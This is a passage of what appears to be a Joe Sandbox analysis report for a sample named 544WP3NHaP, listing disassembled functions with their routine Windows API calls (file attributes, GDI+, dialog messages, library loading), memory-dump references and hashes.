                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GdiplusShutdownUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3856339756-0
                                                                                                                                  • Opcode ID: 59cd871ebb44c9c0e3c4bbb4b4b7db126c4554dd6764ce3c0a0778ded2369381
                                                                                                                                  • Instruction ID: bb36656d363ef7bea0d6b438b25209cdd448dedc36789420dd403142782a238c
                                                                                                                                  • Opcode Fuzzy Hash: 59cd871ebb44c9c0e3c4bbb4b4b7db126c4554dd6764ce3c0a0778ded2369381
                                                                                                                                  • Instruction Fuzzy Hash: 03E06D72648650EFCB009B5CDC46B49FBADFB88B20F00436AF416D37A0CB74A841CA95
                                                                                                                                  Function 008AA243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,008AA23A,?,008A755C,?,?,?,?), ref: 008AA254
                                                                                                                                    • Part of subcall function 008ABB03: _wcslen.LIBCMT ref: 008ABB27
                                                                                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,008AA23A,?,008A755C,?,?,?,?), ref: 008AA280
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AttributesFile$_wcslen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2673547680-0
                                                                                                                                  • Opcode ID: 8172f7122cca0c430c8b0792f44a125d07f2dbe827048e3e2decedf0ee081f11
                                                                                                                                  • Instruction ID: a30ad1356e75ed99aa622dcbe74d749dea5c382d0efc0fb7467fdafac3e77227
                                                                                                                                  • Opcode Fuzzy Hash: 8172f7122cca0c430c8b0792f44a125d07f2dbe827048e3e2decedf0ee081f11
                                                                                                                                  • Instruction Fuzzy Hash: 67E092315001285BDB50AB68CC05BE97B98FB1D3E1F044261FD45E3290D770DE44CAA1
                                                                                                                                  Function 008BDEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • _swprintf.LIBCMT ref: 008BDEEC
                                                                                                                                    • Part of subcall function 008A4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008A40A5
                                                                                                                                  • SetDlgItemTextW.USER32(00000065,?), ref: 008BDF03
                                                                                                                                    • Part of subcall function 008BB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008BB579
                                                                                                                                    • Part of subcall function 008BB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008BB58A
                                                                                                                                    • Part of subcall function 008BB568: IsDialogMessageW.USER32(00010424,?), ref: 008BB59E
                                                                                                                                    • Part of subcall function 008BB568: TranslateMessage.USER32(?), ref: 008BB5AC
                                                                                                                                    • Part of subcall function 008BB568: DispatchMessageW.USER32(?), ref: 008BB5B6
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718869927-0
                                                                                                                                  • Opcode ID: 56350b6ee95ed26d12f4da96c1e6e8d980bf40880b086c1672600083e19e79cf
                                                                                                                                  • Instruction ID: 93b457cabbbc993f437075d84c2e1e89a71981346b1db778ad150ac7e2a4df49
                                                                                                                                  • Opcode Fuzzy Hash: 56350b6ee95ed26d12f4da96c1e6e8d980bf40880b086c1672600083e19e79cf
                                                                                                                                  • Instruction Fuzzy Hash: EAE09B714142486ADF01A764DC06FDE3B6CFB15785F040851B205DB1E3D974E6109666
                                                                                                                                  Function 008B081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008B0836
                                                                                                                                  • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008AF2D8,Crypt32.dll,00000000,008AF35C,?,?,008AF33E,?,?,?), ref: 008B0858
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DirectoryLibraryLoadSystem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1175261203-0
                                                                                                                                  • Opcode ID: 7f08953ece57a1c4c8deeb2a8ae7c366d30274445312de4d1dc6697b19709918
                                                                                                                                  • Instruction ID: 37b10b1caa8128b372133629a3b22919eb711be49d2b5265187d27dc74af16da
                                                                                                                                  • Opcode Fuzzy Hash: 7f08953ece57a1c4c8deeb2a8ae7c366d30274445312de4d1dc6697b19709918
                                                                                                                                  • Instruction Fuzzy Hash: 83E04F768011286BDB11ABA5DC09FDB7BACFF093D1F040076B649E2104DAB4EB84CBB1
                                                                                                                                  Function 008BA3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 008BA3DA
                                                                                                                                  • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 008BA3E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BitmapCreateFromGdipStream
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1918208029-0
                                                                                                                                  • Opcode ID: 64ad4ce116f6aeaaaf20536ec0bdfc73731ae4d79f66df1dc4ebd2b84f78007f
                                                                                                                                  • Instruction ID: 630e88d4e1d9b6623989b31df3316477a0a6da8ae1cf6671507c7b7c014492c0
                                                                                                                                  • Opcode Fuzzy Hash: 64ad4ce116f6aeaaaf20536ec0bdfc73731ae4d79f66df1dc4ebd2b84f78007f
                                                                                                                                  • Instruction Fuzzy Hash: 7EE0ED71500218EFCB14DF99C5416EDBBE8FF08364F10805AA856E3301E374AE44DBA2
                                                                                                                                  Function 008C2B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008C2BAA
                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008C2BB5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1660781231-0
                                                                                                                                  • Opcode ID: 0c83e5942991eab14c6738ebbe39fc5e9f795decc9b34ce1b228ac7aeeea8032
                                                                                                                                  • Instruction ID: 4fa17a9f064fd09375ffe22d83416be16677b3bd1c01bbf8de3dfc47162031df
                                                                                                                                  • Opcode Fuzzy Hash: 0c83e5942991eab14c6738ebbe39fc5e9f795decc9b34ce1b228ac7aeeea8032
                                                                                                                                  • Instruction Fuzzy Hash: 0FD0A934154300D88C147A78280AF482375FE91B78BA083DEF020C94C1EE30D881A012
                                                                                                                                  Function 008A12F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ItemShowWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3351165006-0
                                                                                                                                  • Opcode ID: 4967eaf6145ae4ac8749a453c7044ed508396e348c8f56603dd8ec6ef15da1ad
                                                                                                                                  • Instruction ID: e2b481a3933407563aabf44debc037b078073971bb040c9125918826fb0e5d70
                                                                                                                                  • Opcode Fuzzy Hash: 4967eaf6145ae4ac8749a453c7044ed508396e348c8f56603dd8ec6ef15da1ad
                                                                                                                                  • Instruction Fuzzy Hash: 03C0123206C200BECB410BB4DC09C2BBBACABA9712F04C908B0A5C0060C238C110EB51
                                                                                                                                  Function 008A1A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: f5c4e5bc5b4d436c0ff126e222fa507d2c6fb9f04d6731af4180ae234924ce35
                                                                                                                                  • Instruction ID: 14130e4d7fc532a3cd3b7c34356672288f12a9f6157f6d8646f3a5908988c400
                                                                                                                                  • Opcode Fuzzy Hash: f5c4e5bc5b4d436c0ff126e222fa507d2c6fb9f04d6731af4180ae234924ce35
                                                                                                                                  • Instruction Fuzzy Hash: A5C18F70A002549FFF15CF68C498BA97BA6FF16320F0801BAEC45DBB96DB309945CB61
                                                                                                                                  Function 008A3BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: 9b0e5f0e934da58a36efdda14e8f5668767573416f5b53e9e228535c2d844ba6
                                                                                                                                  • Instruction ID: e275ddf7beb1e0aebdee24e19f2307fe9a8be6a96a07d48e0c1aecb9c828f9c0
                                                                                                                                  • Opcode Fuzzy Hash: 9b0e5f0e934da58a36efdda14e8f5668767573416f5b53e9e228535c2d844ba6
                                                                                                                                  • Instruction Fuzzy Hash: EB719071500F449EEB25DB74C8559E7B7E9FB16300F40092EF2ABC7A41DA326694DF12
                                                                                                                                  Function 008A8284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A8289
                                                                                                                                    • Part of subcall function 008A13DC: __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                    • Part of subcall function 008AA56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 008AA598
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog$CloseFind
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2506663941-0
                                                                                                                                  • Opcode ID: 0f96a09f1b3e2d7208137f109e76ae4890f71c1c62efcaefb9179c33eff42366
                                                                                                                                  • Instruction ID: fb8bb588f713cf093bc164c7991c8c44acb9651539d5fa0f52b769a957cbbd6c
                                                                                                                                  • Opcode Fuzzy Hash: 0f96a09f1b3e2d7208137f109e76ae4890f71c1c62efcaefb9179c33eff42366
                                                                                                                                  • Instruction Fuzzy Hash: DF41C9719046589AEF20DBA4CC55AEAB7B8FF06304F4404EAE18AD7582EB755EC4CB21
                                                                                                                                  Function 008A13E1 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                    • Part of subcall function 008A5E37: __EH_prolog.LIBCMT ref: 008A5E3C
                                                                                                                                    • Part of subcall function 008ACE40: __EH_prolog.LIBCMT ref: 008ACE45
                                                                                                                                    • Part of subcall function 008AB505: __EH_prolog.LIBCMT ref: 008AB50A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: ff4f002dfdb238a450996d2968eae011d780e4942e887f6a3e8198d8f30b437f
                                                                                                                                  • Instruction ID: bc0e7e179cbc1c5d6b06cdac6628e934891eb5f7eccb5bdabe70917b382ae201
                                                                                                                                  • Opcode Fuzzy Hash: ff4f002dfdb238a450996d2968eae011d780e4942e887f6a3e8198d8f30b437f
                                                                                                                                  • Instruction Fuzzy Hash: 3E4135B0905B409EE724CF7D8885AE6FBE5FB19310F504A2EE5EEC3282CB316654CB15
                                                                                                                                  Function 008A13DC Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                    • Part of subcall function 008A5E37: __EH_prolog.LIBCMT ref: 008A5E3C
                                                                                                                                    • Part of subcall function 008ACE40: __EH_prolog.LIBCMT ref: 008ACE45
                                                                                                                                    • Part of subcall function 008AB505: __EH_prolog.LIBCMT ref: 008AB50A
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: 386c3256724c2800ae0758da4ebd56e1bd08cf9288c806a248d9a93e37c7ef13
                                                                                                                                  • Instruction ID: 23e4c2ad40d3455e0587e90dd52ba359e8941760125c636da87149e487a8ef57
                                                                                                                                  • Opcode Fuzzy Hash: 386c3256724c2800ae0758da4ebd56e1bd08cf9288c806a248d9a93e37c7ef13
                                                                                                                                  • Instruction Fuzzy Hash: 614114B0905B409EE724DF798885AE6FBE5FB19310F544A2E95EEC3282CB316654CB11
                                                                                                                                  Function 008BB093 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • __EH_prolog.LIBCMT ref: 008BB098
                                                                                                                                    • Part of subcall function 008A13DC: __EH_prolog.LIBCMT ref: 008A13E1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: H_prolog
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                  • Opcode ID: 61f61a79dbd58555ecaa1d72fbb917bc019ac61c72b5c6c5d295a7986f545fc0
                                                                                                                                  • Instruction ID: 3dd5824d1844f55a4d0e8d8219c541048ba41ee08d4e832dd6a641e3cb025059
                                                                                                                                  • Opcode Fuzzy Hash: 61f61a79dbd58555ecaa1d72fbb917bc019ac61c72b5c6c5d295a7986f545fc0
                                                                                                                                  • Instruction Fuzzy Hash: 1D315671800249AEDF15DFA8C851AEEBBB4FF19304F1044AEE409F7242DB75AE04CB62
                                                                                                                                  Function 008CAC98 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 008CACF8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656819451.0000000000903000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_8a0000_544WP3NHaP.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 190572456-0
                                                                                                                                  • Opcode ID: 89dae35ab12e1ec7fd60e9c0a2e183c67f2798ba4b71616ee8d5860655626b1d
                                                                                                                                  • Instruction ID: dd364ae42932b302f5b884b25bc22394e4f9050956ec9f33fee78b925439f927
                                                                                                                                  • Opcode Fuzzy Hash: 89dae35ab12e1ec7fd60e9c0a2e183c67f2798ba4b71616ee8d5860655626b1d
                                                                                                                                  • Instruction Fuzzy Hash: 5E110633A0162D5F9B3A9E2DEC40E5A73B5FB843287164229FE16EB254D730DC0187D2
                                                                                                                                  Function 008A9215 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1656231282.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1656217398.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656258141.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.00000000008E5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1656697059.0000000000902000.00000004.00000001.01000000.00000003.sdmpDownload File
